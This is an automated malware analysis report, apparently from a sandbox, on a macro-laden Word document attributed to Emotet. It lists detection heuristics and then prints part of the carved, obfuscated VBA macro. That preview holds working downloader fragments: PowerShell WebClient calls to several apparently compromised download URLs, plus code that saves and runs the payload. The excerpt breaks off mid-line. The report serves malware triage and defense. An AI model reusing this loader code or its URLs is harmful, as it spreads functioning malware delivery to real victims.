Verdict: MALICIOUS
Risk Score: 344

Malware Insights

MITRE ATT&CK:
- T1059.005 Visual Basic
- T1204.002 Malicious File
The sample triggers a critical heuristic for an obfuscated auto-exec VBA loader: an AutoOpen macro that uses Shell() to execute code. The ClamAV signature 'Doc.Macro.Emotet-6374344-0' strongly suggests the Emotet family. The VBA script attempts to construct a URL for downloading a second-stage payload, which is common Emotet behavior.
Heuristics (10)

- ClamAV: Doc.Macro.Emotet-6374344-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Macro.Emotet-6374344-0
- VBA macros detected (medium, OLE_VBA_MACROS, 4 related findings): Document contains VBA macro code
- Shell() call in VBA (critical, OLE_VBA_SHELL): Shell() call in VBA
- Obfuscated auto-exec VBA loader (critical, OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER): Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
- AutoOpen macro (high, OLE_VBA_AUTOOPEN): AutoOpen macro
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Password-protected archive handoff (high, SE_PASSWORD_ARCHIVE_LURE): Document gives password instructions for an archive or attachment; this is often used to keep payloads encrypted until after gateway scanning.
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Suspicious extracted artifact (info, EXTRACTED_FILE_STATIC_TRIAGE): One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 52813 bytes |

SHA-256: 02751826383a04ae5811a95117aef77058e37a028931e45220db7906cb264249

Detection:
- ClamAV: No threats found
- Obfuscation or payload: likely (carved artifact contains 44 long base64-like blobs)
Preview script: first 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "AGTaZjzVC"
Function VjLNsbtZs()
CsrEfpoC = "" + VUJXMTR + Mid("CcZsJiYptM8l4OoDYCzqo1RW5L37bhWH).repLaCE(lqHKEBlqH,lqHBQtlqH).repLaCE('0J5bD1", 32, 41) + KZEqYOt + SsrLzwZ
ZjtoVEUX = "" + pZluEIK + Mid("js5frrEjftwa53+[CHar]75),GQ3h'+'j79N", 13, 22) + qODAiUu + kjNRhKF
LUMvPiwpwmW = "" + ZCuQzYJ + Mid("6jMVDVTzVGj7ui18L5D+'qH+lqHhost KEB'+'_.lqH+lqHExlq'+'H+lqHclqH+lqHeption.MlqH+lqnv0jaHkB", 20, 62) + ztjwXTG + cbJiBDC
fvAFJ = "" + XQKhdYZ + Mid("cEdpas = KlqHZXMlk13fOz4B839OMO", 4, 10) + SAVDKYC + PZJwPGJ
zFiiF = "" + TTaduZF + Mid("Y4GQ3+GQ3+lqHomlqH+lqH/lqH+lqHSSlqH+lqHbTyrS/,http:/'+'lqH+lGQ3+GQ3qH/www.deco'+'ry.ir/XlqH+lqHFlGQ3+GQ3E'+'TilqH+lqHrlqH+lqHRslqH+lqH/'+'CDGQ3+GQ3GlqH+lq'+'H.SplqH+oq5jiVTXui", 3, 163) + ukPoWNE + ztDAAiQ
IFlCUSpcLz = "" + XlMjjGc + Mid("HnABG2wjNEJN0UElSFFz6itoUUllAce('hj7',[sTRiNG][ChAR]92).rEplAce('xTr',[sTRiNG][ChAR]36) |. ( $eNv:PubLiC[13]+RUpLTtnKL7J", 28, 82) + iGBDAql + zwQVcUk
dWYTmpvMzUZ = "" + oRzJWAa + Mid("th3a7H3wYlGQ3+lqHWebClielqGQ3+GQ3H+lqHnt;lqH+lqHGQ3+GQ3KEBnlqH+lqHslqH+lqHadlqH+lqH'+'asd = new-olqH+lqHb'+'jecGQ3+GQ3t raGQ3+GQ3ndomlqH+lqH;lqH+lqHKEllrFGN", 11, 141) + zENUEFM + qcukFiI
DYftB = "" + WSwjSdh + Mid("mnTRwcBPp419IplzYiri3QwiQ4jhJudfJar]1'+'16),GQ3xTrGQ3).'+'rePLACE(GQ3lqHGQ3,[STRINg][CHar1JV1Li", 34, 56) + wazcsrw + vOErJOt
MjYblMiD = "" + mVLitZN + Mid("YjjMaYnFm2ipiYWuFoS28qEPqlqHlit(CDlqH+lqHG,ClqH+lqHDGlqH+lqH);KEBklqH+lqHarlqH+lqHalqH+lqHdt", 26, 65) + DSkijRm + cXVvGLL
JQkVzA = "" + jfVUzEI + Mid("iz5DlqBFrALc3DzYiQbivCEtNwaA9HqdN+lqHEBlqH+lqHnsadasd'+'l'+'qH+lqH.nexlqH+lqHt(1,lqH+lqH 3lqH+lqH432GQ3+GQ345);KE'+'Bhuas = lqH+'+'l'+'qHKlqH+lqHEBGQ3+'+'GQ3enlqH+lqHvlqH+lqH:pulq'+'H+lqHblilqH+lqHc + UCYF", 34, 168) + mTpaZLR + DGltROJ
WljuOZ = "" + alNGPaw + Mid("a+'+'l'+'qHbjeGQ3+GQ3ct lqH+lqHSlqH+lqHylqH+lqHslqH+lqHGQ3+GQ3tem.lqH+lqHGQ3+GQ3NlqH+lqHel'+'qH+lqHt.lqHGQ3+Ks46aRUjON71QL4ATJYb", 2, 107) + ROMbswj + OzBNZlJ
MQBzHU = "" + jKzivEp + Mid("Ub4twH+'qH+lqH:lqH+lqH//wlqH+l'+'qHww.lqH+lqHe'+'cobulqH+lqHildlqH+lqHslqH+lqHolulqH+GQ3+GQ3lqHtiolqH+lqHnsghlqH+lqH.lqH+lqHcom/ilZlqH+lqH/lqH+lqH,'+'httplqH+lqH://v'+'lqH+lqHir'+'tlqH+lqHualdol'+aO3NInK2uP37M6jFWi09bf2zW", 7, 190) + bwARKTs + wwUFjIE
vIZDSNKGnUP = "" + OqqEcFZ + Mid("3EtE1oKhj8LnjFwiZ3iR]GQ3+GQ3112+[cHaR]98+[cHaR]86),lqHJ5KlqH).repLaCE(([cHaR]67+[cHaR]68+[cHaR]71),[strING][cHaR]3GQ3+GQ39) ) GQ3).rePLACE(([C'+'Har]66+[CHar]81+[CHlS3jCGEKLHDzjqBFzW06", 20, 145) + KajRIjS + zThYuqO
fjntzNGj = "" + PcjzPkw + Mid("pcv5IluIVT3/lqH+lqH,http:/lqH+lqH/www.emont-dnlqH+lqHepr.com/DZolqH+lqHnlGQ3+GQ3qH+lqHGQ3+GQ3tElqH+lqHnlqH+lqH/,htlqH+l'+'qHGQ3+GQ3tpl'uJvXKR7puPWkwcEul9U", 12, 124) + CvJGdMz + CiVacmr
WiYXDnw = "" + rvaifzn + Mid("dZvPPoI5UpirpJJjwaRVPWqAqH+lqHBbclqH+lqHd lqH+lqH= ClqH+lqHDGhtlqH+lq'+'Htp://wwwlq'+'H+lqH.relqH+'+'lqHmakevision.colqH+lqHm/OpmlEVBr8sX3NlUMk", 25, 104) + dwAchid + iAcvmIK
vTBufi = "" + AwGtUod + Mid("XRzu5f6JWi1aCXROHessaglqH+lqHe;lqH+lqH}lqH+lqH}lqU9qp", 17, 33) + aJwPvjj + wpivvlW
RBlfJm = "" + osoWdwU + Mid("XpXIl3lqHtrinlGQ3+GQ3qH+lqHg(),lGQ3+GQ3qH+lqH KlqH+lqHEBhuas);Il'+'qH+lqHnvoke-Item(lqH+lqHKEBhuas);lqH+lqHbreaklqH'+'+lqH;}lqH+lqHclqH+lqHatlqH+lqHclqH+lqHh{lqH+lqHwlqH+lqHrite-l'aISJZZr", 6, 175) + KnhAvjC + JACBDEb
rlwSXwFvX = "" + HYIYbNp + Mid("L2jMDuQj8fiCn53 ('&( xTrPsHoMe[4]+'+'xTrPShome'+'[34]+GQ3xGQ3) ((GQ3.( GQ3+GQ3BQtENV:cOmspeC'+'[4,15,25]-joI'+'NlqHlqH)'+' ((lqHKlqH+lqHEBfranclqH+lqH l'+'qH+lqH= lqH+lqHnelqH+lqHw-olq'+'HW0c1XQmSwk", 16, 173) + mFFkFbk + ioEvCKT
OPcjjJRaIOv = "" + ticOomJ + Mid("YqOwuiBRsv2iLHEMdiovK1WCJ+'([cHaIib2", 26, 7) + hbLzaER + UlSqVhp
XchNI = "" + ToWhQCo + Mid("ZBf6CoWtkMMFBwvXVcj6$env:PUBLIC[5]+'X')UoUALbzDn", 21, 19) + UwYAJId + sLwLoCm
jiblihJQF = "" + TnRmCXj + Mid("a8hNsZwZ8InzlqH+lqHCDGlqH+lqHplqH+lqHb
... (truncated)